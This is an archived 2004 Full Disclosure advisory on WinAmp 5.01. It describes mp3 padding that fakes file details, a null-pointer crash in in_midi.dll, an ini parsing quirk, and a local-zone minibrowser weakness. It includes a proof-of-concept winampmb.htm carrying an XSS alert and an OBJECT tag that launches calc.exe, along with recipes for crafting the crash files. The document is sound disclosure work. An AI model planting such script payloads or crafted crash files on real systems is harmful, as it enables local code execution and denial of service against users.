Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

WinAmp <=5.01 - Multiple Vulnerabilities
From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Thu, 25 Mar 2004 10:04:25 +0200

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Software:       WinAmp
Vendor:          NullSoft
                        http://www.nullsoft.com
                        http://www.winamp.com
Versions:       <=5.01
Platforms:      Windows
Bug:                Multiple Vulnerabilities
Risk:                Medium
Exploitation:   Local
Date:               25 Feb 2004
Author:            Rafel Ivgi, The-Insider
e-mail:             the_insider () mail com
web:                http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Winamp is more than just a player. It's your window to the multimedia world.
From MP3s to streaming video, Winamp is the one place you go to feed your
audio/video habit. Winamp is one of the world's most common audio/video file
players.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Faking File Details:
--------------------------
Adding a lot of '01' chars to the *BEGINING* of a mp3 file, will create fake
file details.
The length of the mp3 will increase, it will be considered
copyrighted,original, with a lot of frames and
with invalid Emphasis. The song will also be loaded with delay.

Example:
Size: 123136633 bytes
Header found at: 7122 bytes
Length: 2565 seconds
MPEG 1.0 layer 1
384kbit, 98273 frames
44100Hz 2 Channel
CRCs: No
Copyrighted: Yes
Original: Yes
Emphasis: invalid

Adding a lot of '01' chars to the *END* of a mp3 file, will create different
fake file details.
The bitrate of the mp3 will increase, the mhz will decrease and upon play
the .

Example:
Size: 123136873 bytes
Header found at: 4266 bytes
Length: 3420 seconds
MPEG 1.0 layer 1
288kbit, 95013 frames
32000Hz Stereo
CRCs: No
Copyrighted: No
Original: No
Emphasis: CITT j.17





Crash/Buffer Overflow:
------------------------------
Changing an midified mp3 file's extention to ".mid" will cause a CRASH/
BUFFER OVERFLOW at "in_midi.dll".
Crash/Overflow = [choose a number] x '\x01'  + [original mp3 file content] +
[choose a number] x '\x01' + ".mid".
screen capture:    http://theinsider.deep-ice.com/images/winampbof.jpg
screen capture:    http://theinsider.deep-ice.com/images/winampbof2.jpg

A similar overflow had been found in the past by coresecurity. This overflow
does not allow
code excution. It is a Null Pointer Crash. Can be seen clearly when adding a
"bugged" file
using the "add --> dir" function. (the dir must contain more regular mp3
files)


Minibrowser Copromise:
----------------------------------
Winamp minibrowser (alt+T)/(alt+L) loading "winampmb.htm" as default.
Anyone can modify the "winampmb.htm" to have scripts, winamp runs this file
with "LocalZone" access.


Example of a modified "winampmb.htm" :
-------------- CUT HERE ----------------
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
 <title>Winamp's Minibrowser</title>
</head>
<style type="text/css">
<!--
 a:link
  {
  color:#0000FF;
  }
 a:visited
  {
  color:#0000FF;
  }
 a:hover
  {
  color:red;
  }
    a.test:link
        {
        color:red;
        }

 BODY
 {
  background-color: #FFFFFF;
  font-family: Arial, Helvetica;
  color:black;
 }
 .default
 {
  font-size:10pt;
 }
    .logo
    {
    font-family: Arial Black, Arial, Helvetica;
    font-size: 13pt;
    color: #FFC800;
    filter: glow(color=#000000, strength=2);
    height:1;
    }
-->
</style>

<body topmargin="0" leftmargin="0" rightmargin="0" marginheight="0"
marginheight="0">
<table cellpadding="0" cellspacing="0" width="100%">
    <tr><td style="background-color:#800000;" nowrap>
           <div class="coffee logo">&nbsp;WINAMP</div>
           <div class="coffee logo"
style="margin-top: -24px;">&nbsp;WINAMP</div>
           <div class="coffee logo"
style="margin-top: -24px;">&nbsp;WINAMP</div>
    </td></tr>
    <tr><td style="background-color:#FFC800;"
nowrap><table></table></td></tr>
</table>
<table width="96%" align="center">
    <tr><td height="5" nowrap><table></table></td></tr>
    <tr><td class="default">Welcome to the Minibrowser, connect to the
internet and check out the cool links below.</td></tr>
    <tr><td height="5" nowrap><table></table></td></tr>
    </table>
<table width="93%" cellpadding="5" cellspacing="0" style="border: 1px solid
#DDDDDD;" align="center">
    <tr>
        <td style="border: 1px solid #DDDDDD;background-color:#F7F7F7;">
            <table cellpadding="0" cellspacing="0" border="0"
class="default">
             <tr>
              <td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.shoutcast.com/waradio.phtml"; target="outside"><b>Winamp
Radio</b></a></div>Free MP3 Internet Radio that you control.</td>
             </tr>
                <tr><td height="10" nowrap><table></table></td></tr>
             <tr>
              <td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/skins/"; target="outside"><b>Free
Skins</b></a></div>Give your Winamp a new look and feel.</td>
             </tr>
                <tr><td height="10" nowrap><table></table></td></tr>
             <tr>
              <td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/plugins/"; target="outside"><b>Free
Plug-ins</b></a></div>Add to what your Winamp can do. Add games, ability to
play new files, and more!</td>
             </tr>
                <tr><td height="10" nowrap><table></table></td></tr>
             <tr>
              <td style="font-size:8pt;"><div
style="font-family:Verdana;font-size:13pt;"><a
href="http://www.winamp.com/music/?mb=1"; target="outside"><b>Grab Some
Music</b></a></div>Get some tunes from our sponsors, it's all free!</td>
             </tr>
            </table>
        </td>
    </tr>
</table>
<div align="center" class="default" style="font-size:.6em;">Copyright <a
href="http://www.nullsoft.com"; target="outside">Nullsoft Inc.</a>
1997-2001</div>
</body>
</html>
<script>alert('xss')</script><OBJECT
CLASSID="CLSID:10000000-0000-0000-0000-000000000000"
CODEBASE="C:\windows\system32\calc.exe"></OBJECT>
-------------- CUT HERE ----------------



Bugs:
-------
WinAmp/ini: If an empty value is located at "RecentURL1=" or if it
doesn't exsist then Winamp ignores the rest of the urls...

Example:
RecentURL1=
RecentURL2=http://www.server2.com:8080
RecentURL3=http://www.server3.com:8080
RecentURL4=http://www.server4.com:8080

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Fake MP3 file details = 10000 x '\x01'  + [original mp3 file content] +
10000 x '\x01'.
Crash/Overflow = 10000 x '\x01'  + [original mp3 file content] + 10000 x
'\x01' + ".mid".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider      -   advisory#38.txt
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]